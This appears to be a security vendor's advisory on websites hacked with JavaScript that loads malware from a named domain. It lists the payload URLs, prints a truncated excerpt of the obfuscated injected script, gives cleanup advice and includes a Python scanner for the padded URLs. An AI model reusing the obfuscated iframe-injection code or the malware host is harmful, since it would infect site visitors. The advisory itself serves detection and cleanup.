Web sites hacked with malware from iopap.upperdarby26.com

We are seeing today a good number of sites hacked with malware from http://iopap.upperdarby26.com. The malicious JavaScript is appended to the bottom of every index.php file and to the bottom of a few JavaScript files as well.

The malware is getting loaded from a few different files, all with the same content:

http://iopap.upperdarby26.com/FIFO.js
http://iopap.upperdarby26.com/Web_Ring.js
http://iopap.upperdarby26.com/Real-Time.js
http://iopap.upperdarby26.com/Applet1.html
..
http://iopap.upperdarby26.com/Infotainment.js


The good news is that Google has already blacklisted this domain, so it won't affect most users. As for the code itself, it generates an iframe on the infected site, which loads the malware from http://iopap.upperdarby26.com:8080/index.php. Interestingly, it checks the browser being used and only attempts to infect Internet Explorer and Google Chrome users.

try{ Qfygq4h5tym = ''; Ukpckqd7dzaz37d9e = ['height', 'width']; Srbx29lfsp1vhizv = document.referrer;
M89l8krh3jas5 = 'h ^ t H t p ! : % / H / H i H o ^ p % a > p H . % u ^ p ! p % e H r ! d ! a H r > b > y ^ 2 > 6 % . ! c ^ o H m ! : > 8 > 0 > 8 ^ 0 % / ^ i ! n ^ d > e > x H . ! p H h % p % ?% p % i % d ! = ^ 1 > & H J > l ^ q H k % x > 7 ! 8 H a > e ! l ! h % 0 % y > 4 H 5 H = ! 1 ! & ^ m > = H 1 > '.replace(/[>%!H^]/g, '')..

Sites affected: No specific web host or application is being targeted, so we think the attackers are using stolen FTP credentials to hack the sites. If your site got hacked, remove the offending code from the index/JavaScript files and change your passwords ASAP. It is also a good idea to clean your desktop (run a virus scan) to make sure it didn't get compromised.
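
To help locate the offending code during cleanup, here is an added example (not Sucuri's tooling and not code from the original post): it walks a web root, undoes the junk-character padding in any string literal that is followed by a .replace(/[...]/g, '') call, and reports index.php and .js files hiding a URL on the domain named here. The function names, the BAD_HOSTS set and the constructed SAMPLE are assumptions for illustration.

```python
import os
import re

# Host named in this post; add other known-bad hosts as needed.
BAD_HOSTS = {"iopap.upperdarby26.com"}

# 'padded string'.replace(/[junk]/g, '') -- the junk-stripping idiom in the
# injected script. Assumption: the junk class is a plain list of characters.
PADDED = re.compile(
    r"""(['"])((?:(?!\1).)*)\1\s*\.replace\(\s*/\[([^\]]+)\]/g\s*,\s*(['"])\4\s*\)""",
    re.DOTALL,
)
URL = re.compile(r"https?://([^/:?#\s]+)\S*")

def decode_padded(source):
    """Return every padded string literal in source with its junk removed."""
    out = []
    for m in PADDED.finditer(source):
        body, junk = m.group(2), m.group(3)
        plain = body.translate({ord(c): None for c in junk})
        out.append("".join(plain.split()))  # drop spacing between characters
    return out

def bad_urls(source):
    """URLs hidden in padded strings whose host is in BAD_HOSTS."""
    hits = []
    for plain in decode_padded(source):
        hits += [m.group(0) for m in URL.finditer(plain)
                 if m.group(1).lower() in BAD_HOSTS]
    return hits

def scan_tree(root):
    """Check index.php and *.js files under root; return {path: [urls]}."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name == "index.php" or name.endswith(".js"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    urls = bad_urls(fh.read())
                if urls:
                    report[path] = urls
    return report

# Constructed sample (not from an infected file): a page with a padded URL appended.
_PAD = "".join(c + ">%!H^"[i % 5] for i, c in enumerate("http://iopap.upperdarby26.com:8080/index.php"))
SAMPLE = "<?php echo 'ok'; ?>\n<script>A = '" + _PAD + "'.replace(/[>%!H^]/g, '');</script>"
```

Run scan_tree against a local copy of the web root; any file it reports should be inspected by hand before the appended script is removed.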


If your site has been hacked (or has malware), and you need help, send us an email to support@sucuri.net or visit our site: Sucuri Security. We can get it cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.
